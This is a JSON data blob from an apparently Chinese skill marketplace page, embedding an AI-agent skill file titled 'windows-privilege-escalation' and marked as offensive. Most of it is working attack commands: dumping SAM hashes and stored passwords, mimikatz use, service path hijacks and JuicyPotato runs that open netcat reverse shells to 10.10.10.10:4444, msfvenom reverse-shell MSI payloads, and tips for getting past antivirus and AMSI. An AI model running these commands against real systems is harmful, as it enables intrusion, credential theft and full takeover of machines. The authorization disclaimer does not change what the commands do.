[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-3af790b9-aa4e-40a9-8420-7f2439cafde0":3,"$fSLDcX30aLLtNHPPYq-bluPcTLyIk0DZHwff4h1uBEbg":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"3af790b9-aa4e-40a9-8420-7f2439cafde0","windows-privilege-escalation","提供在渗透测试活动中发现和利用Windows系统权限提升漏洞的系统方法。","cat_life_career","mod_other","sickn33,other","---\nname: windows-privilege-escalation\ndescription: \"Provide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# Windows Privilege Escalation\n\n## Purpose\n\nProvide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements. This skill covers system enumeration, credential harvesting, service exploitation, token impersonation, kernel exploits, and various misconfigurations that enable escalation from standard user to Administrator or SYSTEM privileges.\n\n## Inputs \u002F Prerequisites\n\n- **Initial Access**: Shell or RDP access as standard user on Windows system\n- **Enumeration Tools**: WinPEAS, PowerUp, Seatbelt, or manual commands\n- **Exploit Binaries**: Pre-compiled exploits or ability to transfer tools\n- **Knowledge**: Understanding of Windows security model and privileges\n- **Authorization**: Written permission for penetration testing activities\n\n## Outputs \u002F Deliverables\n\n- **Privilege Escalation Path**: Identified vector to higher privileges\n- **Credential Dump**: Harvested passwords, hashes, or tokens\n- **Elevated Shell**: Command execution as Administrator or SYSTEM\n- **Vulnerability Report**: Documentation of misconfigurations and exploits\n- **Remediation Recommendations**: Fixes for identified weaknesses\n\n## Core Workflow\n\n### 1. System Enumeration\n\n#### Basic System Information\n```powershell\n# OS version and patches\nsysteminfo | findstr \u002FB \u002FC:\"OS Name\" \u002FC:\"OS Version\"\nwmic qfe\n\n# Architecture\nwmic os get osarchitecture\necho %PROCESSOR_ARCHITECTURE%\n\n# Environment variables\nset\nGet-ChildItem Env: | ft Key,Value\n\n# List drives\nwmic logicaldisk get caption,description,providername\n```\n\n#### User Enumeration\n```powershell\n# Current user\nwhoami\necho %USERNAME%\n\n# User privileges\nwhoami \u002Fpriv\nwhoami \u002Fgroups\nwhoami \u002Fall\n\n# All users\nnet user\nGet-LocalUser | ft Name,Enabled,LastLogon\n\n# User details\nnet user administrator\nnet user %USERNAME%\n\n# Local groups\nnet localgroup\nnet localgroup administrators\nGet-LocalGroupMember Administrators | ft Name,PrincipalSource\n```\n\n#### Network Enumeration\n```powershell\n# Network interfaces\nipconfig \u002Fall\nGet-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address\n\n# Routing table\nroute print\nGet-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric\n\n# ARP table\narp -A\n\n# Active connections\nnetstat -ano\n\n# Network shares\nnet share\n\n# Domain Controllers\nnltest \u002FDCLIST:DomainName\n```\n\n#### Antivirus Enumeration\n```powershell\n# Check AV products\nWMIC \u002FNode:localhost \u002FNamespace:\\\\root\\SecurityCenter2 Path AntivirusProduct Get displayName\n```\n\n### 2. Credential Harvesting\n\n#### SAM and SYSTEM Files\n```powershell\n# SAM file locations\n%SYSTEMROOT%\\repair\\SAM\n%SYSTEMROOT%\\System32\\config\\RegBack\\SAM\n%SYSTEMROOT%\\System32\\config\\SAM\n\n# SYSTEM file locations\n%SYSTEMROOT%\\repair\\system\n%SYSTEMROOT%\\System32\\config\\SYSTEM\n%SYSTEMROOT%\\System32\\config\\RegBack\\system\n\n# Extract hashes (from Linux after obtaining files)\npwdump SYSTEM SAM > sam.txt\nsamdump2 SYSTEM SAM -o sam.txt\n\n# Crack with John\njohn --format=NT sam.txt\n```\n\n#### HiveNightmare (CVE-2021-36934)\n```powershell\n# Check vulnerability\nicacls C:\\Windows\\System32\\config\\SAM\n# Vulnerable if: BUILTIN\\Users:(I)(RX)\n\n# Exploit with mimikatz\nmimikatz> token::whoami \u002Ffull\nmimikatz> misc::shadowcopies\nmimikatz> lsadump::sam \u002Fsystem:\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM \u002Fsam:\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM\n```\n\n#### Search for Passwords\n```powershell\n# Search file contents\nfindstr \u002FSI \u002FM \"password\" *.xml *.ini *.txt\nfindstr \u002Fsi password *.xml *.ini *.txt *.config\n\n# Search registry\nreg query HKLM \u002Ff password \u002Ft REG_SZ \u002Fs\nreg query HKCU \u002Ff password \u002Ft REG_SZ \u002Fs\n\n# Windows Autologin credentials\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\" 2>nul | findstr \"DefaultUserName DefaultDomainName DefaultPassword\"\n\n# PuTTY sessions\nreg query \"HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\"\n\n# VNC passwords\nreg query \"HKCU\\Software\\ORL\\WinVNC3\\Password\"\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4 \u002Fv password\n\n# Search for specific files\ndir \u002FS \u002FB *pass*.txt == *pass*.xml == *cred* == *vnc* == *.config*\nwhere \u002FR C:\\ *.ini\n```\n\n#### Unattend.xml Credentials\n```powershell\n# Common locations\nC:\\unattend.xml\nC:\\Windows\\Panther\\Unattend.xml\nC:\\Windows\\Panther\\Unattend\\Unattend.xml\nC:\\Windows\\system32\\sysprep.inf\nC:\\Windows\\system32\\sysprep\\sysprep.xml\n\n# Search for files\ndir \u002Fs *sysprep.inf *sysprep.xml *unattend.xml 2>nul\n\n# Decode base64 password (Linux)\necho \"U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=\" | base64 -d\n```\n\n#### WiFi Passwords\n```powershell\n# List profiles\nnetsh wlan show profile\n\n# Get cleartext password\nnetsh wlan show profile \u003CSSID> key=clear\n\n# Extract all WiFi passwords\nfor \u002Ff \"tokens=4 delims=: \" %a in ('netsh wlan show profiles ^| find \"Profile \"') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr \"SSID Cipher Key\" | find \u002Fv \"Number\" & echo.) & @echo on\n```\n\n#### PowerShell History\n```powershell\n# View PowerShell history\ntype %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\ncat (Get-PSReadlineOption).HistorySavePath\ncat (Get-PSReadlineOption).HistorySavePath | sls passw\n```\n\n### 3. Service Exploitation\n\n#### Incorrect Service Permissions\n```powershell\n# Find misconfigured services\naccesschk.exe -uwcqv \"Authenticated Users\" * \u002Faccepteula\naccesschk.exe -uwcqv \"Everyone\" * \u002Faccepteula\naccesschk.exe -ucqv \u003Cservice_name>\n\n# Look for: SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG\n\n# Exploit vulnerable service\nsc config \u003Cservice> binpath= \"C:\\nc.exe -e cmd.exe 10.10.10.10 4444\"\nsc stop \u003Cservice>\nsc start \u003Cservice>\n```\n\n#### Unquoted Service Paths\n```powershell\n# Find unquoted paths\nwmic service get name,displayname,pathname,startmode | findstr \u002Fi \"Auto\" | findstr \u002Fi \u002Fv \"C:\\Windows\\\\\"\nwmic service get name,displayname,startmode,pathname | findstr \u002Fi \u002Fv \"C:\\Windows\\\\\" | findstr \u002Fi \u002Fv \"\"\"\n\n# Exploit: Place malicious exe in path\n# For path: C:\\Program Files\\Some App\\service.exe\n# Try: C:\\Program.exe or C:\\Program Files\\Some.exe\n```\n\n#### AlwaysInstallElevated\n```powershell\n# Check if enabled\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated\n\n# Both must return 0x1 for vulnerability\n\n# Create malicious MSI\nmsfvenom -p windows\u002Fx64\u002Fshell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o evil.msi\n\n# Install (runs as SYSTEM)\nmsiexec \u002Fquiet \u002Fqn \u002Fi C:\\evil.msi\n```\n\n### 4. Token Impersonation\n\n#### Check Impersonation Privileges\n```powershell\n# Look for these privileges\nwhoami \u002Fpriv\n\n# Exploitable privileges:\n# SeImpersonatePrivilege\n# SeAssignPrimaryTokenPrivilege\n# SeTcbPrivilege\n# SeBackupPrivilege\n# SeRestorePrivilege\n# SeCreateTokenPrivilege\n# SeLoadDriverPrivilege\n# SeTakeOwnershipPrivilege\n# SeDebugPrivilege\n```\n\n#### Potato Attacks\n```powershell\n# JuicyPotato (Windows Server 2019 and below)\nJuicyPotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a \"\u002Fc c:\\tools\\nc.exe 10.10.10.10 4444 -e cmd.exe\" -t *\n\n# PrintSpoofer (Windows 10 and Server 2019)\nPrintSpoofer.exe -i -c cmd\n\n# RoguePotato\nRoguePotato.exe -r 10.10.10.10 -e \"C:\\nc.exe 10.10.10.10 4444 -e cmd.exe\" -l 9999\n\n# GodPotato\nGodPotato.exe -cmd \"cmd \u002Fc whoami\"\n```\n\n### 5. Kernel Exploitation\n\n#### Find Kernel Vulnerabilities\n```powershell\n# Use Windows Exploit Suggester\nsysteminfo > systeminfo.txt\npython wes.py systeminfo.txt\n\n# Or use Watson (on target)\nWatson.exe\n\n# Or use Sherlock PowerShell script\npowershell.exe -ExecutionPolicy Bypass -File Sherlock.ps1\n```\n\n#### Common Kernel Exploits\n```\nMS17-010 (EternalBlue) - Windows 7\u002F2008\u002F2003\u002FXP\nMS16-032 - Secondary Logon Handle - 2008\u002F7\u002F8\u002F10\u002F2012\nMS15-051 - Client Copy Image - 2003\u002F2008\u002F7\nMS14-058 - TrackPopupMenu - 2003\u002F2008\u002F7\u002F8.1\nMS11-080 - afd.sys - XP\u002F2003\nMS10-015 - KiTrap0D - 2003\u002FXP\u002F2000\nMS08-067 - NetAPI - 2000\u002FXP\u002F2003\nCVE-2021-1732 - Win32k - Windows 10\u002FServer 2019\nCVE-2020-0796 - SMBGhost - Windows 10\nCVE-2019-1388 - UAC Bypass - Windows 7\u002F8\u002F10\u002F2008\u002F2012\u002F2016\u002F2019\n```\n\n### 6. Additional Techniques\n\n#### DLL Hijacking\n```powershell\n# Find missing DLLs with Process Monitor\n# Filter: Result = NAME NOT FOUND, Path ends with .dll\n\n# Compile malicious DLL\n# For x64: x86_64-w64-mingw32-gcc windows_dll.c -shared -o evil.dll\n# For x86: i686-w64-mingw32-gcc windows_dll.c -shared -o evil.dll\n```\n\n#### Runas with Saved Credentials\n```powershell\n# List saved credentials\ncmdkey \u002Flist\n\n# Use saved credentials\nrunas \u002Fsavecred \u002Fuser:Administrator \"cmd.exe \u002Fk whoami\"\nrunas \u002Fsavecred \u002Fuser:WORKGROUP\\Administrator \"\\\\10.10.10.10\\share\\evil.exe\"\n```\n\n#### WSL Exploitation\n```powershell\n# Check for WSL\nwsl whoami\n\n# Set root as default user\nwsl --default-user root\n# Or: ubuntu.exe config --default-user root\n\n# Spawn shell as root\nwsl whoami\nwsl python -c 'import os; os.system(\"\u002Fbin\u002Fbash\")'\n```\n\n## Quick Reference\n\n### Enumeration Tools\n\n| Tool | Command | Purpose |\n|------|---------|---------|\n| WinPEAS | `winPEAS.exe` | Comprehensive enumeration |\n| PowerUp | `Invoke-AllChecks` | Service\u002Fpath vulnerabilities |\n| Seatbelt | `Seatbelt.exe -group=all` | Security audit checks |\n| Watson | `Watson.exe` | Missing patches |\n| JAWS | `.\\jaws-enum.ps1` | Legacy Windows enum |\n| PrivescCheck | `Invoke-PrivescCheck` | Privilege escalation checks |\n\n### Default Writable Folders\n\n```\nC:\\Windows\\Temp\nC:\\Windows\\Tasks\nC:\\Users\\Public\nC:\\Windows\\tracing\nC:\\Windows\\System32\\spool\\drivers\\color\nC:\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\n```\n\n### Common Privilege Escalation Vectors\n\n| Vector | Check Command |\n|--------|---------------|\n| Unquoted paths | `wmic service get pathname \\| findstr \u002Fi \u002Fv \"\"\"` |\n| Weak service perms | `accesschk.exe -uwcqv \"Everyone\" *` |\n| AlwaysInstallElevated | `reg query HKCU\\...\\Installer \u002Fv AlwaysInstallElevated` |\n| Stored credentials | `cmdkey \u002Flist` |\n| Token privileges | `whoami \u002Fpriv` |\n| Scheduled tasks | `schtasks \u002Fquery \u002Ffo LIST \u002Fv` |\n\n### Impersonation Privilege Exploits\n\n| Privilege | Tool | Usage |\n|-----------|------|-------|\n| SeImpersonatePrivilege | JuicyPotato | CLSID abuse |\n| SeImpersonatePrivilege | PrintSpoofer | Spooler service |\n| SeImpersonatePrivilege | RoguePotato | OXID resolver |\n| SeBackupPrivilege | robocopy \u002Fb | Read protected files |\n| SeRestorePrivilege | Enable-SeRestorePrivilege | Write protected files |\n| SeTakeOwnershipPrivilege | takeown.exe | Take file ownership |\n\n## Constraints and Limitations\n\n### Operational Boundaries\n- Kernel exploits may cause system instability\n- Some exploits require specific Windows versions\n- AV\u002FEDR may detect and block common tools\n- Token impersonation requires service account context\n- Some techniques require GUI access\n\n### Detection Considerations\n- Credential dumping triggers security alerts\n- Service modification logged in Event Logs\n- PowerShell execution may be monitored\n- Known exploit signatures detected by AV\n\n### Legal Requirements\n- Only test systems with written authorization\n- Document all escalation attempts\n- Avoid disrupting production systems\n- Report all findings through proper channels\n\n## Examples\n\n### Example 1: Service Binary Path Exploitation\n```powershell\n# Find vulnerable service\naccesschk.exe -uwcqv \"Authenticated Users\" * \u002Faccepteula\n# Result: RW MyService SERVICE_ALL_ACCESS\n\n# Check current config\nsc qc MyService\n\n# Stop service and change binary path\nsc stop MyService\nsc config MyService binpath= \"C:\\Users\\Public\\nc.exe 10.10.10.10 4444 -e cmd.exe\"\nsc start MyService\n\n# Catch shell as SYSTEM\n```\n\n### Example 2: AlwaysInstallElevated Exploitation\n```powershell\n# Verify vulnerability\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated\n# Both return: 0x1\n\n# Generate payload (attacker machine)\nmsfvenom -p windows\u002Fx64\u002Fshell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o shell.msi\n\n# Transfer and execute\nmsiexec \u002Fquiet \u002Fqn \u002Fi C:\\Users\\Public\\shell.msi\n\n# Catch SYSTEM shell\n```\n\n### Example 3: JuicyPotato Token Impersonation\n```powershell\n# Verify SeImpersonatePrivilege\nwhoami \u002Fpriv\n# SeImpersonatePrivilege Enabled\n\n# Run JuicyPotato\nJuicyPotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a \"\u002Fc c:\\users\\public\\nc.exe 10.10.10.10 4444 -e cmd.exe\" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}\n\n# Catch SYSTEM shell\n```\n\n### Example 4: Unquoted Service Path\n```powershell\n# Find unquoted path\nwmic service get name,pathname | findstr \u002Fi \u002Fv \"\"\"\n# Result: C:\\Program Files\\Vuln App\\service.exe\n\n# Check write permissions\nicacls \"C:\\Program Files\\Vuln App\"\n# Result: Users:(W)\n\n# Place malicious binary\ncopy C:\\Users\\Public\\shell.exe \"C:\\Program Files\\Vuln.exe\"\n\n# Restart service\nsc stop \"Vuln App\"\nsc start \"Vuln App\"\n```\n\n### Example 5: Credential Harvesting from Registry\n```powershell\n# Check for auto-logon credentials\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\"\n# DefaultUserName: Administrator\n# DefaultPassword: P@ssw0rd123\n\n# Use credentials\nrunas \u002Fuser:Administrator cmd.exe\n# Or for remote: psexec \\\\target -u Administrator -p P@ssw0rd123 cmd\n```\n\n## Troubleshooting\n\n| Issue | Cause | Solution |\n|-------|-------|----------|\n| Exploit fails (AV detected) | AV blocking known exploits | Use obfuscated exploits; living-off-the-land (mshta, certutil); custom compiled binaries |\n| Service won't start | Binary path syntax | Ensure space after `=` in binpath: `binpath= \"C:\\path\\binary.exe\"` |\n| Token impersonation fails | Wrong privilege\u002Fversion | Check `whoami \u002Fpriv`; verify Windows version compatibility |\n| Can't find kernel exploit | System patched | Run Windows Exploit Suggester: `python wes.py systeminfo.txt` |\n| PowerShell blocked | Execution policy\u002FAMSI | Use `powershell -ep bypass -c \"cmd\"` or `-enc \u003Cbase64>` |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,131,1753,"2026-05-16 13:47:19",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"其他","other","mdi-page-next-outline","其他类型Skill",5,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"职场发展","career","mdi-briefcase-outline","面试准备、简历优化、职业规划",4,575,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"fa0275ac-3c21-4fed-945e-130e7b91612f","1.0.0","windows-privilege-escalation.zip",5634,"uploads\u002Fskills\u002F3af790b9-aa4e-40a9-8420-7f2439cafde0\u002Fwindows-privilege-escalation.zip","b8eab4789b67ba91d3264417b5aed8305fc51c3f76137ee8d2c45e92018ea8a5","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":14427}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]